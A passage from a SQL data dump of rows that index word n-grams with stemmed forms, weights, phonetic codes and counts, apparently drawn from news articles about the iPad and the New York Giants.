witness',0,1,1.3333,'T520',1,'en'),(17929,'to witness much','to witness much',0,1,1.5,'T5252',1,'en'),(17930,'to wobble','to wobble',0,1,1.3,'T140',1,'en'),(17931,'to wobble but','to wobble but',0,1,1.4333,'T1413',1,'en'),(17932,'to your','to your',0,1,1.2333,'T600',5,'en'),(17933,'to your abyss','to your abyss',0,1,1.4333,'T612',1,'en'),(17934,'today','todai',0,0,0.3333,'T000',4,'en'),(17935,'today is','todai is',0,1,1.2667,'T200',1,'en'),(17936,'today is earlier','todai is earlier',0,1,1.5333,'T2646',1,'en'),(17937,'tolerable','toler',0,0,0.6,'T4614',1,'en'),(17938,'tolerable to','toler to',0,1,1.4,'T46143',1,'en'),(17939,'tolerable to type','toler to type',0,1,1.5667,'T461431',1,'en'),(17940,'tops','top',0,0,0.2667,'T120',2,'en'),(17941,'tops nation','top nation',0,1,1.3667,'T12535',1,'en'),(17942,'tops nation report','top nation report',0,1,1.6,'T125356163',1,'en'),(17943,'touch','touch',0,0,0.3333,'T200',1,'en'),(17944,'touch pads','touch pads',0,1,1.3333,'T2132',1,'en'),(17945,'touch pads and','touch pads and',0,1,1.4667,'T213253',1,'en'),(17946,'touch screens','touch screens',0,1,1.4333,'T2652',1,'en'),(17947,'touch screens and','touch screens and',0,1,1.5667,'T265253',1,'en'),(17948,'touch screens exactly','touch screens exactly',0,1,1.7,'T265234',1,'en'),(17949,'touchscreen','touchscreen',0,0,0.7333,'T265',1,'en'),(17950,'touchscreen display','touchscreen display',0,1,1.6333,'T2653214',1,'en'),(17951,'touchscreen display with','touchscreen display with',0,1,1.8,'T26532143',1,'en'),(17952,'tractor','tractor',0,0,0.4667,'T6236',1,'en'),(17953,'tractor trailer','tractor trailer',0,1,1.5,'T62363646',1,'en'),(17954,'tractor trailer hit','tractor trailer hit',0,1,1.6333,'T623636463',1,'en'),(17955,'traditional','tradit',0,0,0.7333,'T6354',2,'en'),(17956,'traditional main','tradit main',0,1,1.5333,'T63545',1,'en'),(17957,'traditional main system','tradit main system',0,1,1.7667,'T63545235',1,'en'),(17958,'trailer','trailer',0,0,0.4667,'T646',1,'en'),(17959,'trailer hit','trailer hit',0,1,1.3667,'T6463',1,'en'),(17960,'trailer hit his','trailer hit his',0,1,1.5,'T64632',1,'en'),(17961,'trooper','trooper',0,0,0.4667,'T616',1,'en'),(17962,'trooper dies','trooper dies',0,1,1.4,'T61632',1,'en'),(17963,'trooper dies from','trooper dies from',0,1,1.5667,'T61632165',1,'en'),(17964,'trust','trust',0,0,0.3333,'T623',1,'en'),(17965,'trust your','trust your',0,1,1.3333,'T6236',1,'en'),(17966,'trust your fingers','trust your fingers',0,1,1.6,'T623615262',1,'en'),(17967,'two','two',0,0,0.2,'T000',8,'en'),(17968,'two not','two not',0,1,1.2333,'T530',1,'en'),(17969,'two not so','two not so',0,1,1.3333,'T532',1,'en'),(17970,'type much','type much',0,1,1.3,'T152',1,'en'),(17971,'type much this','type much this',0,1,1.4667,'T15232',1,'en'),(17972,'type on','type on',0,1,1.2333,'T150',1,'en'),(17973,'type on the','type on the',0,1,1.3667,'T153',1,'en'),(17974,'type standing','type standing',0,1,1.4333,'T1235352',1,'en'),(17975,'type standing up','type standing up',0,1,1.5333,'T12353521',1,'en'),(17976,'type with','type with',0,1,1.3,'T130',1,'en'),(17977,'type with my','type with my',0,1,1.4,'T135',1,'en'),(17978,'types','type',0,0,0.3333,'T120',2,'en'),(17979,'types much','type much',0,1,1.3333,'T1252',1,'en'),(17980,'types much taking','type much taking',0,1,1.5667,'T12523252',1,'en'),(17981,'underrated','underr',0,0,0.6667,'U5363',1,'en'),(17982,'underrated advantage','underr advantage',0,1,1.6667,'U53631532',1,'en'),(17983,'underrated advantage if','underr advantage if',0,1,1.7667,'U536315321',1,'en'),(17984,'unusual','unusu',0,0,0.4667,'U524',1,'en'),(17985,'unusual pages','unusu pages',0,1,1.4333,'U52412',1,'en'),(17986,'unusual pages is','unusu pages is',0,1,1.5333,'U52412',1,'en'),(17987,'up','up',1,0,0.0167,'U100',10,'en'),(17988,'up and','up and',0,1,1.2,'U153',2,'en'),(17989,'up and down','up and down',0,1,1.3667,'U1535',1,'en'),(17990,'up chime','up chime',0,1,1.2667,'U125',1,'en'),(17991,'up chime would','up chime would',0,1,1.4667,'U12543',1,'en'),(17992,'up position','up position',0,1,1.3667,'U1235',1,'en'),(17993,'up position demonstrated','up position demonstrated',0,1,1.8,'U1235352363',1,'en'),(17994,'up the','up the',0,1,1.2,'U130',2,'en'),(17995,'up the ipad','up the ipad',0,1,1.3667,'U1313',1,'en'),(17996,'up this','up this',0,1,1.2333,'U132',1,'en'),(17997,'up this can','up this can',0,1,1.3667,'U1325',1,'en'),(17998,'up when','up when',0,1,1.2333,'U150',1,'en'),(17999,'up when i','up when i',0,1,1.3,'U150',1,'en'),(18000,'updates','updat',0,0,0.4667,'U132',2,'en'),(18001,'updates are','updat are',0,1,1.3667,'U1326',1,'en'),(18002,'updates are you','updat are you',0,1,1.5,'U1326',1,'en'),(18003,'updating','updat',0,0,0.5333,'U1352',1,'en'),(18004,'updating the','updat the',0,1,1.4,'U13523',1,'en'),(18005,'updating the ipad','updat the ipad',0,1,1.5667,'U1352313',1,'en'),(18006,'upload free','upload free',0,1,1.3667,'U14316',1,'en'),(18007,'upload free classics','upload free classics',0,1,1.6667,'U14316242',1,'en'),(18008,'usa','usa',0,0,0.2,'U200',4,'en'),(18009,'usa today','usa today',0,1,1.3,'U230',1,'en'),(18010,'usa today is','usa today is',0,1,1.4,'U232',1,'en'),(18011,'use','us',1,0,0.025,'U200',8,'en'),(18012,'use of','us of',0,1,1.2,'U210',3,'en'),(18013,'use of but','us of but',0,1,1.3333,'U213',1,'en'),(18014,'use to','us to',0,1,1.2,'U230',2,'en'),(18015,'use to the','us to the',0,1,1.3333,'U230',1,'en'),(18016,'uses','us',0,0,0.2667,'U200',4,'en'),(18017,'uses the','us the',0,1,1.2667,'U230',1,'en'),(18018,'uses the apple','us the apple',0,1,1.4667,'U2314',1,'en'),(18019,'via','via',1,0,0.025,'V000',2,'en'),(18020,'via internet','via internet',0,1,1.4,'V53653',1,'en'),(18021,'via internet that','via internet that',0,1,1.5667,'V53653',1,'en'),(18022,'view full','view full',0,1,1.3,'V400',1,'en'),(18023,'view full sizethe','view full sizethe',0,1,1.5667,'V423',1,'en'),(18024,'viruses','virus',0,0,0.4667,'V620',1,'en'),(18025,'viruses and','virus and',0,1,1.3667,'V6253',1,'en'),(18026,'viruses and updates','virus and updates',0,1,1.6333,'V6253132',1,'en'),(18027,'wait','wait',0,0,0.2667,'W300',3,'en'),(18028,'wait for','wait for',0,1,1.2667,'W316',2,'en'),(18029,'wait for an','wait for an',0,1,1.3667,'W3165',2,'en'),(18030,'waiting','wait',0,0,0.4667,'W352',2,'en'),(18031,'waiting for','wait for',0,1,1.3667,'W35216',1,'en'),(18032,'waiting for your','wait for your',0,1,1.5333,'W35216',1,'en'),(18033,'want to','want to',0,1,1.2333,'W530',3,'en'),(18034,'want to listen','want to listen',0,1,1.4667,'W534235',1,'en'),(18035,'want to use','want to use',0,1,1.3667,'W532',1,'en'),(18036,'was a','wa a',0,1,1.1667,'W200',4,'en'),(18037,'was a clever','wa a clever',0,1,1.4,'W2416',1,'en'),(18038,'was a meager','wa a meager',0,1,1.4,'W2526',1,'en'),(18039,'was expecting','wa expecting',0,1,1.4333,'W212352',1,'en'),(18040,'was expecting it','wa expecting it',0,1,1.5333,'W2123523',1,'en'),(18041,'was hard','wa hard',0,1,1.2667,'W263',1,'en'),(18042,'was hard to','wa hard to',0,1,1.3667,'W263',1,'en'),(18043,'was not','wa not',0,1,1.2333,'W253',3,'en'),(18044,'was not it\'s','wa not it',0,1,1.4,'W2532',1,'en'),(18045,'wasn\'t','wasn',0,0,0.4,'W253',5,'en'),(18046,'wasn\'t able','wasn able',0,1,1.3667,'W25314',1,'en'),(18047,'wasn\'t able to','wasn able to',0,1,1.4667,'W253143',1,'en'),(18048,'way but','wai but',0,1,1.2333,'W130',1,'en'),(18049,'way but who','wai but who',0,1,1.3667,'W130',1,'en'),(18050,'way round','wai round',0,1,1.3,'W653',1,'en'),(18051,'way round 1.apple','wai round 1.apple',0,1,1.5667,'W65314',1,'en'),(18052,'way to','wai to',0,1,1.2,'W300',2,'en'),(18053,'way to let','wai to let',0,1,1.3333,'W343',1,'en'),(18054,'way you can','wai you can',0,1,1.3667,'W250',1,'en'),(18055,'web access','web access',0,1,1.3333,'W120',1,'en'),(18056,'web access unusual','web access unusual',0,1,1.6,'W12524',1,'en'),(18057,'well suited','well suited',0,1,1.3667,'W423',1,'en'),(18058,'well suited for','well suited for',0,1,1.5,'W42316',1,'en'),(18059,'were','were',1,0,0.0333,'W600',8,'en'),(18060,'were static','were static',0,1,1.3667,'W6232',1,'en'),(18061,'were static print','were static print',0,1,1.5667,'W62321653',1,'en'),(18062,'what','what',1,0,0.0333,'W300',5,'en'),(18063,'what happened','what happened',0,1,1.4333,'W3153',1,'en'),(18064,'what happened to','what happened to',0,1,1.5333,'W3153',1,'en'),(18065,'when','when',1,0,0.0333,'W500',11,'en'),(18066,'when i','when i',0,1,1.2,'W500',4,'en'),(18067,'when i held','when i held',0,1,1.3667,'W543',1,'en'),(18068,'when you','when you',0,1,1.2667,'W500',2,'en'),(18069,'when you pick','when you pick',0,1,1.4333,'W512',1,'en'),(18070,'when you want','when you want',0,1,1.4333,'W530',1,'en'),(18071,'when you work','when you work',0,1,1.4333,'W562',1,'en'),(18072,'whether the','whether the',0,1,1.3667,'W363',1,'en'),(18073,'whether the ipad','whether the ipad',0,1,1.5333,'W36313',1,'en'),(18074,'while jeff','while jeff',0,1,1.3333,'W421',1,'en'),(18075,'while jeff jarvis','while jeff jarvis',0,1,1.5667,'W4212612',1,'en'),(18076,'while outside','while outside',0,1,1.4333,'W4323',1,'en'),(18077,'while outside magazine','while outside magazine',0,1,1.7333,'W4323525',1,'en'),(18078,'while the','while the',0,1,1.3,'W430',3,'en'),(18079,'while the start','while the start',0,1,1.5,'W432363',1,'en'),(18080,'while you','while you',0,1,1.3,'W400',1,'en'),(18081,'while you work','while you work',0,1,1.4667,'W462',1,'en'),(18082,'whiz','whiz',0,0,0.2667,'W200',1,'en'),(18083,'whiz bang','whiz bang',0,1,1.3,'W2152',1,'en'),(18084,'whiz bang demos','whiz bang demos',0,1,1.5,'W2152352',1,'en'),(18085,'who','who',1,0,0.025,'W000',13,'en'),(18086,'who put','who put',0,1,1.2333,'W130',1,'en'),(18087,'who put their','who put their',0,1,1.4333,'W136',1,'en'),(18088,'who types','who types',0,1,1.3,'W312',1,'en'),(18089,'who types much','who types much',0,1,1.4667,'W31252',1,'en'),(18090,'why a','why a',0,1,1.1667,'W000',1,'en'),(18091,'why a traditional','why a traditional',0,1,1.5667,'W36354',1,'en'),(18092,'why can','why can',0,1,1.2333,'W250',1,'en'),(18093,'why can still','why can still',0,1,1.4333,'W25234',1,'en'),(18094,'wife','wife',0,0,0.2667,'W100',3,'en'),(18095,'wife held','wife held',0,1,1.3,'W143',1,'en'),(18096,'wife held them','wife held them',0,1,1.4667,'W1435',1,'en'),(18097,'will have','will have',0,1,1.3,'W410',1,'en'),(18098,'will have to','will have to',0,1,1.4,'W413',1,'en'),(18099,'winnie','winni',0,0,0.4,'W500',1,'en'),(18100,'winnie all','winni all',0,1,1.3333,'W540',1,'en'),(18101,'winnie all pooh','winni all pooh',0,1,1.5,'W541',1,'en'),(18102,'with more','with more',0,1,1.3,'W356',1,'en'),(18103,'with more news','with more news',0,1,1.4667,'W35652',1,'en'),(18104,'with my','with my',0,1,1.2333,'W350',2,'en'),(18105,'with my thumbs','with my thumbs',0,1,1.4667,'W353512',1,'en'),(18106,'with nearly','with nearly',0,1,1.3667,'W3564',1,'en'),(18107,'with nearly all','with nearly all',0,1,1.5,'W3564',1,'en'),(18108,'with pages','with pages',0,1,1.3333,'W312',1,'en'),(18109,'with pages that','with pages that',0,1,1.5,'W3123',1,'en'),(18110,'with stories','with stories',0,1,1.4,'W32362',1,'en'),(18111,'with stories presented','with stories presented',0,1,1.7333,'W3236216253',1,'en'),(18112,'with winnie','with winnie',0,1,1.3667,'W350',1,'en'),(18113,'with winnie all','with winnie all',0,1,1.5,'W354',1,'en'),(18114,'witness','wit',0,0,0.4667,'W352',1,'en'),(18115,'witness much','wit much',0,1,1.4,'W35252',1,'en'),(18116,'witness much from','wit much from',0,1,1.5667,'W35252165',1,'en'),(18117,'wobble','wobbl',0,0,0.4,'W140',1,'en'),(18118,'wobble but','wobbl but',0,1,1.3333,'W1413',1,'en'),(18119,'wobble but it','wobbl but it',0,1,1.4333,'W1413',1,'en'),(18120,'wonder','wonder',0,0,0.4,'W536',1,'en'),(18121,'wonder if','wonder if',0,1,1.3,'W5361',1,'en'),(18122,'wonder if the','wonder if the',0,1,1.4333,'W53613',1,'en'),(18123,'word','word',0,0,0.2667,'W630',3,'en'),(18124,'word or','word or',0,1,1.2333,'W636',1,'en'),(18125,'word or google','word or google',0,1,1.4667,'W63624',1,'en'),(18126,'word processing','word processing',0,1,1.5,'W6316252',1,'en'),(18127,'word processing you','word processing you',0,1,1.6333,'W6316252',1,'en'),(18128,'work if','work if',0,1,1.2333,'W621',1,'en'),(18129,'work if apple','work if apple',0,1,1.4333,'W6214',1,'en'),(18130,'work in','work in',0,1,1.2333,'W625',1,'en'),(18131,'work in any','work in any',0,1,1.3667,'W625',1,'en'),(18132,'world-wide-web','world-wide-web',0,0,0.9333,'W6431',2,'en'),(18133,'world-wide-web is','world-wide-web is',0,1,1.5667,'W64312',1,'en'),(18134,'world-wide-web is inconvenient','world-wide-web is inconvenient',0,1,2,'W64312525153',1,'en'),(18135,'worlds','world',0,0,0.4,'W6432',1,'en'),(18136,'worlds or','world or',0,1,1.3,'W64326',1,'en'),(18137,'worlds or the','world or the',0,1,1.4333,'W643263',1,'en'),(18138,'would','would',1,0,0.0417,'W430',7,'en'),(18139,'would be','would be',0,1,1.2667,'W431',2,'en'),(18140,'would be bad','would be bad',0,1,1.4,'W4313',1,'en'),(18141,'would deal','would deal',0,1,1.3333,'W434',1,'en'),(18142,'would deal with','would deal with',0,1,1.5,'W4343',1,'en'),(18143,'would not','would not',0,1,1.3,'W4353',1,'en'),(18144,'would not type','would not type',0,1,1.4667,'W43531',1,'en'),(18145,'would still','would still',0,1,1.3667,'W43234',1,'en'),(18146,'would still be','would still be',0,1,1.4667,'W432341',1,'en'),(18147,'years in','year in',0,1,1.2667,'Y625',1,'en'),(18148,'years in prison','year in prison',0,1,1.5,'Y6251625',1,'en'),(18149,'yet','yet',1,0,0.025,'Y300',4,'en'),(18150,'yet after','yet after',0,1,1.3,'Y3136',1,'en'),(18151,'yet after that','yet after that',0,1,1.4667,'Y31363',1,'en'),(18152,'york','york',0,0,0.2667,'Y620',3,'en'),(18153,'york times','york times',0,1,1.3333,'Y62352',1,'en'),(18154,'york times app','york times app',0,1,1.4667,'Y623521',1,'en'),(18155,'you almost','you almost',0,1,1.3333,'Y4523',1,'en'),(18156,'you almost don\'t','you almost don',0,1,1.5333,'Y452353',1,'en'),(18157,'you an','you an',0,1,1.2,'Y500',1,'en'),(18158,'you an ipad','you an ipad',0,1,1.3667,'Y513',1,'en'),(18159,'you are in','you are in',0,1,1.3333,'Y650',1,'en'),(18160,'you are reproduced','you are reproduced',0,1,1.6,'Y616323',1,'en'),(18161,'you but','you but',0,1,1.2333,'Y130',1,'en'),(18162,'you but an','you but an',0,1,1.3333,'Y135',1,'en'),(18163,'you can also','you can also',0,1,1.4,'Y2542',1,'en'),(18164,'you can move','you can move',0,1,1.4,'Y251',1,'en'),(18165,'you can open','you can open',0,1,1.4,'Y2515',1,'en'),(18166,'you can see','you can see',0,1,1.3667,'Y252',1,'en'),(18167,'you can upload','you can upload',0,1,1.4667,'Y25143',1,'en'),(18168,'you coupled','you coupled',0,1,1.3667,'Y2143',1,'en'),(18169,'you coupled to','you coupled to',0,1,1.4667,'Y2143',1,'en'),(18170,'you hear','you hear',0,1,1.2667,'Y600',1,'en'),(18171,'you hear the','you hear the',0,1,1.4,'Y630',1,'en'),(18172,'you like','you like',0,1,1.2667,'Y420',1,'en'),(18173,'you like to','you like to',0,1,1.3667,'Y423',1,'en'),(18174,'you may','you may',0,1,1.2333,'Y500',2,'en'),(18175,'you may type','you may type',0,1,1.4,'Y531',1,'en'),(18176,'you might','you might',0,1,1.3,'Y523',1,'en'),(18177,'you might find','you might find',0,1,1.4667,'Y523153',1,'en'),(18178,'you pick','you pick',0,1,1.2667,'Y120',1,'en'),(18179,'you pick up','you pick up',0,1,1.3667,'Y121',1,'en'),(18180,'you see','you see',0,1,1.2333,'Y200',2,'en'),(18181,'you see when','you see when',0,1,1.4,'Y250',1,'en'),(18182,'you should','you should',0,1,1.3333,'Y243',3,'en'),(18183,'you should do','you should do',0,1,1.4333,'Y243',1,'en'),(18184,'you want to','you want to',0,1,1.3667,'Y530',2,'en'),(18185,'you work','you work',0,1,1.2667,'Y620',1,'en'),(18186,'you work if','you work if',0,1,1.3667,'Y621',1,'en'),(18187,'you work in','you work in',0,1,1.3667,'Y625',1,'en'),(18188,'you would','you would',0,1,1.3,'Y430',2,'en'),(18189,'you would not','you would not',0,1,1.4333,'Y4353',1,'en'),(18190,'you\'d','you',0,0,0.3333,'Y300',1,'en'),(18191,'you\'d have','you have',0,1,1.3333,'Y310',1,'en'),(18192,'you\'d have to','you have to',0,1,1.4333,'Y313',1,'en'),(18193,'you\'ll','you',0,0,0.4,'Y400',1,'en'),(18194,'you\'ll find','you find',0,1,1.3667,'Y4153',1,'en'),(18195,'you\'ll find your','you find your',0,1,1.5333,'Y41536',1,'en'),(18196,'your abyss','your abyss',0,1,1.3333,'Y612',1,'en'),(18197,'your abyss as','your abyss as',0,1,1.4333,'Y612',1,'en'),(18198,'your e','your e',0,1,1.2,'Y600',1,'en'),(18199,'your e mail','your e mail',0,1,1.3667,'Y654',1,'en'),(18200,'your eyes','your eyes',0,1,1.3,'Y620',1,'en'),(18201,'your eyes may','your eyes may',0,1,1.4333,'Y625',1,'en'),(18202,'your fingers','your fingers',0,1,1.4,'Y615262',1,'en'),(18203,'your fingers 3.apple','your fingers 3.apple',0,1,1.6667,'Y61526214',1,'en'),(18204,'your fingers can','your fingers can',0,1,1.5333,'Y6152625',1,'en'),(18205,'your laptop\'s','your laptop',0,1,1.4333,'Y641312',1,'en'),(18206,'your laptop\'s desktop','your laptop desktop',0,1,1.7,'Y6413123231',1,'en'),(18207,'your own','your own',0,1,1.2667,'Y650',1,'en'),(18208,'your own beloved','your own beloved',0,1,1.5333,'Y651413',1,'en'),(18209,'your own silly','your own silly',0,1,1.4667,'Y6524',1,'en'),(18210,'zipping','zip',0,0,0.4667,'Z152',1,'en'),(18211,'zipping and','zip and',0,1,1.3667,'Z15253',1,'en'),(18212,'zipping and zooming','zip and zooming',0,1,1.6333,'Z15253252',1,'en'),(18213,'zoom','zoom',0,0,0.2667,'Z500',1,'en'),(18214,'zoom naturally','zoom naturally',0,1,1.4667,'Z5364',1,'en'),(18215,'zoom naturally view','zoom naturally view',0,1,1.6333,'Z53641',1,'en'),(18216,'zooming','zoom',0,0,0.4667,'Z520',1,'en'),(18217,'zooming builds','zoom builds',0,1,1.4667,'Z521432',1,'en'),(18218,'zooming builds prospects','zoom builds prospects',0,1,1.8,'Z5214321621232',1,'en'),(18219,'\'that','that',0,0,0.3333,'T000',1,'en'),(18220,'\'that may','that may',0,1,1.3,'T500',1,'en'),(18221,'\'that may well','that may well',0,1,1.4667,'T540',1,'en'),(18222,'1 22pm','1 22pm',0,1,1.2,'P500',1,'en'),(18223,'1 22pm a','1 22pm a',0,1,1.2667,'P500',1,'en'),(18224,'10 36pm','10 36pm',0,1,1.2333,'P500',1,'en'),(18225,'10 36pm victor','10 36pm victor',0,1,1.4667,'P51236',1,'en'),(18226,'12','12',0,0,0.2,'',7,'en'),(18227,'12 58am','12 58am',0,1,1.2333,'A500',1,'en'),(18228,'12 58am knight','12 58am knight',0,1,1.4667,'A52523',1,'en'),(18229,'13','13',0,0,0.2,'',2,'en'),(18230,'13 degrees','13 degrees',0,1,1.3333,'D262',1,'en'),(18231,'13 degrees plus','13 degrees plus',0,1,1.5,'D262142',1,'en'),(18232,'138','138',0,0,0.3,'',1,'en'),(18233,'2 28pm','2 28pm',0,1,1.2,'P500',1,'en'),(18234,'2 28pm geno','2 28pm geno',0,1,1.3667,'P525',1,'en'),(18235,'2014','2014',0,0,0.4,'',1,'en'),(18236,'2014 the','2014 the',0,1,1.2667,'T000',1,'en'),(18237,'2014 the 27','2014 the 27',0,1,1.3667,'T000',1,'en'),(18238,'22pm','22pm',0,0,0.2667,'P500',1,'en'),(18239,'22pm a','22pm a',0,1,1.2,'P500',1,'en'),(18240,'22pm a look','22pm a look',0,1,1.3667,'P542',1,'en'),(18241,'24pm','24pm',0,0,0.2667,'P500',1,'en'),(18242,'24pm rex','24pm rex',0,1,1.2667,'P562',1,'en'),(18243,'24pm rex ryan','24pm rex ryan',0,1,1.4333,'P56265',1,'en'),(18244,'26','26',0,0,0.2,'',2,'en'),(18245,'26 8','26 8',0,1,1.1333,'',1,'en'),(18246,'26 8 24pm','26 8 24pm',0,1,1.3,'P500',1,'en'),(18247,'27 year','27 year',0,1,1.2333,'Y600',1,'en'),(18248,'27 year old','27 year old',0,1,1.3667,'Y643',1,'en'),(18249,'28pm','28pm',0,0,0.2667,'P500',1,'en'),(18250,'28pm geno','28pm geno',0,1,1.3,'P525',1,'en'),(18251,'28pm geno smith','28pm geno smith',0,1,1.5,'P525253',1,'en'),(18252,'29','29',0,0,0.2,'',1,'en'),(18253,'29 2','29 2',0,1,1.1333,'',1,'en'),(18254,'29 2 28pm','29 2 28pm',0,1,1.3,'P500',1,'en'),(18255,'36pm','36pm',0,0,0.2667,'P500',1,'en'),(18256,'36pm victor','36pm victor',0,1,1.3667,'P51236',1,'en'),(18257,'36pm victor cruz','36pm victor cruz',0,1,1.5333,'P51236262',1,'en'),(18258,'58am','58am',0,0,0.2667,'A500',1,'en'),(18259,'58am knight','58am knight',0,1,1.3667,'A52523',1,'en'),(18260,'58am knight in','58am knight in',0,1,1.4667,'A525235',1,'en'),(18261,'6 1','6 1',0,1,1.1,'',1,'en'),(18262,'6 1 22pm','6 1 22pm',0,1,1.2667,'P500',1,'en'),(18263,'7 10','7 10',0,1,1.1333,'',1,'en'),(18264,'7 10 36pm','7 10 36pm',0,1,1.3,'P500',1,'en'),(18265,'7 12','7 12',0,1,1.1333,'',1,'en'),(18266,'7 12 58am','7 12 58am',0,1,1.3,'A500',1,'en'),(18267,'8 24pm','8 24pm',0,1,1.2,'P500',1,'en'),(18268,'8 24pm rex','8 24pm rex',0,1,1.3333,'P562',1,'en'),(18269,'a busting','a busting',0,1,1.3,'A12352',1,'en'),(18270,'a busting image','a busting image',0,1,1.5,'A1235252',1,'en'),(18271,'a defensive','a defensive',0,1,1.3667,'A31521',1,'en'),(18272,'a defensive lineman','a defensive lineman',0,1,1.6333,'A3152145',1,'en'),(18273,'a half','a half',0,1,1.2,'A410',1,'en'),(18274,'a half hour','a half hour',0,1,1.3667,'A416',1,'en'),(18275,'a look','a look',0,1,1.2,'A420',2,'en'),(18276,'a look at','a look at',0,1,1.3,'A423',1,'en'),(18277,'a marionette','a marionette',0,1,1.4,'A5653',1,'en'),(18278,'a marionette that','a marionette that',0,1,1.5667,'A5653',1,'en'),(18279,'a mini','a mini',0,1,1.2,'A500',1,'en'),(18280,'a mini suit','a mini suit',0,1,1.3667,'A523',1,'en'),(18281,'a protecting','a protecting',0,1,1.4,'A1632352',1,'en'),(18282,'a protecting lineman','a protecting lineman',0,1,1.6667,'A163235245',1,'en'),(18283,'a quarterback','a quarterback',0,1,1.4333,'A263612',1,'en'),(18284,'a quarterback competition','a quarterback competition',0,1,1.8333,'A2636125135',1,'en'),(18285,'a question','a question',0,1,1.3333,'A235',1,'en'),(18286,'a question of','a question of',0,1,1.4333,'A2351',1,'en'),(18287,'a single','a single',0,1,1.2667,'A2524',3,'en'),(18288,'a single and','a single and',0,1,1.4,'A252453',1,'en'),(18289,'a team','a team',0,1,1.2,'A350',1,'en'),(18290,'a team captain','a team captain',0,1,1.4667,'A352135',1,'en'),(18291,'a week','a week',0,1,1.2,'A200',1,'en'),(18292,'a week to','a week to',0,1,1.3,'A230',1,'en'),(18293,'absolutely','absolut',0,0,0.6667,'A12434',2,'en'),(18294,'absolutely cruz','absolut cruz',0,1,1.5,'A12434262',1,'en'),(18295,'absolutely cruz said','absolut cruz said',0,1,1.6667,'A124342623',1,'en'),(18296,'ad','ad',0,0,0.1333,'A300',2,'en'),(18297,'ad two','ad two',0,1,1.2,'A300',1,'en'),(18298,'ad two days','ad two days',0,1,1.3667,'A320',1,'en'),(18299,'ad with','ad with',0,1,1.2333,'A300',1,'en'),(18300,'ad with the','ad with the',0,1,1.3667,'A300',1,'en'),(18301,'afforded','afford',0,0,0.5333,'A163',1,'en'),(18302,'afforded that','afford that',0,1,1.4333,'A163',1,'en'),(18303,'afforded that luxury','afford that luxury',0,1,1.6667,'A163426',1,'en'),(18304,'after the team','after the team',0,1,1.4667,'A13635',1,'en'),(18305,'aim','aim',0,0,0.2,'A500',1,'en'),(18306,'aim appear','aim appear',0,1,1.3333,'A516',1,'en'),(18307,'aim appear full','aim appear full',0,1,1.5,'A51614',1,'en'),(18308,'air','air',0,0,0.2,'A600',5,'en'),(18309,'air before','air before',0,1,1.3333,'A616',1,'en'),(18310,'air before super','air before super',0,1,1.5333,'A616216',1,'en'),(18311,'allows you','allow you',0,1,1.3333,'A420',1,'en'),(18312,'allows you to','allow you to',0,1,1.4333,'A423',1,'en'),(18313,'also covets','also covets',0,1,1.3667,'A42132',1,'en'),(18314,'also covets another','also covets another',0,1,1.6333,'A42132536',1,'en'),(18315,'amukamara','amukamara',0,0,0.6,'A5256',1,'en'),(18316,'amukamara said','amukamara said',0,1,1.4667,'A525623',1,'en'),(18317,'amukamara said the','amukamara said the',0,1,1.6,'A525623',1,'en'),(18318,'amukamara says','amukamara says',0,1,1.4667,'A52562',1,'en'),(18319,'amukamara says he','amukamara says he',0,1,1.5667,'A52562',1,'en'),(18320,'amukamara wouldn\'t','amukamara wouldn',0,1,1.6,'A52564353',1,'en'),(18321,'amukamara wouldn\'t have','amukamara wouldn have',0,1,1.7667,'A525643531',1,'en'),(18322,'amukamara\'s','amukamara',0,0,0.7333,'A52562',1,'en'),(18323,'amukamara\'s contract','amukamara contract',0,1,1.6667,'A5256253623',1,'en'),(18324,'amukamara\'s contract last','amukamara contract last',0,1,1.8333,'A5256253623423',1,'en'),(18325,'an ad','an ad',0,1,1.1667,'A530',1,'en'),(18326,'an ad with','an ad with',0,1,1.3333,'A530',1,'en'),(18327,'analyst','analyst',0,0,0.4667,'A5423',1,'en'),(18328,'analyst howie','analyst howie',0,1,1.4333,'A5423',1,'en'),(18329,'analyst howie long','analyst howie long',0,1,1.6,'A5423452',1,'en'),(18330,'and a','and a',0,1,1.1667,'A530',7,'en'),(18331,'and a half','and a half',0,1,1.3333,'A5341',1,'en'),(18332,'and friday','and friday',0,1,1.3333,'A53163',1,'en'),(18333,'and friday he','and friday he',0,1,1.4333,'A53163',1,'en'),(18334,'and it','and it',0,1,1.2,'A530',1,'en'),(18335,'and it was','and it was',0,1,1.3333,'A532',1,'en'),(18336,'and misses','and misses',0,1,1.3333,'A5352',1,'en'),(18337,'and misses of','and misses of',0,1,1.4333,'A53521',1,'en'),(18338,'and mornhinweg','and mornhinweg',0,1,1.4667,'A535652',1,'en'),(18339,'and mornhinweg said','and mornhinweg said',0,1,1.6333,'A5356523',1,'en'),(18340,'and once','and once',0,1,1.2667,'A5352',1,'en'),(18341,'and once he','and once he',0,1,1.3667,'A5352',1,'en'),(18342,'and third','and third',0,1,1.3,'A5363',1,'en'),(18343,'and third round','and third round',0,1,1.5,'A5363653',1,'en'),(18344,'another','anoth',0,0,0.4667,'A536',4,'en'),(18345,'another fact','anoth fact',0,1,1.4,'A536123',1,'en'),(18346,'another fact he','anoth fact he',0,1,1.5,'A536123',1,'en'),(18347,'appear full','appear full',0,1,1.3667,'A1614',1,'en'),(18348,'appear full blog','appear full blog',0,1,1.5333,'A1614142',1,'en'),(18349,'april','april',0,0,0.3333,'A164',1,'en'),(18350,'april 26','april 26',0,1,1.2667,'A164',1,'en'),(18351,'april 26 8','april 26 8',0,1,1.3333,'A164',1,'en'),(18352,'april 29','april 29',0,1,1.2667,'A164',1,'en'),(18353,'april 29 2','april 29 2',0,1,1.3333,'A164',1,'en'),(18354,'armor','armor',0,0,0.3333,'A656',1,'en'),(18355,'armor amukamara','armor amukamara',0,1,1.5,'A6565256',1,'en'),(18356,'armor amukamara says','armor amukamara says',0,1,1.6667,'A65652562',1,'en'),(18357,'as you\'re','as you',0,1,1.3,'A260',1,'en'),(18358,'as you\'re long','as you long',0,1,1.4667,'A26452',1,'en'),(18359,'at duffy','at duffy',0,1,1.2667,'A310',1,'en'),(18360,'at duffy square','at duffy square',0,1,1.5,'A3126',1,'en'),(18361,'at fox\'s','at fox',0,1,1.2667,'A312',1,'en'),(18362,'at fox\'s temporary','at fox temporary',0,1,1.6,'A3123516',1,'en'),(18363,'at minicamp','at minicamp',0,1,1.3667,'A35251',1,'en'),(18364,'at minicamp if','at minicamp if',0,1,1.4667,'A35251',1,'en'),(18365,'at several','at several',0,1,1.3333,'A32164',1,'en'),(18366,'at several hits','at several hits',0,1,1.5,'A3216432',1,'en'),(18367,'at the same','at the same',0,1,1.3667,'A325',1,'en'),(18368,'be a','be a',0,1,1.1333,'B000',6,'en'),(18369,'be a team','be a 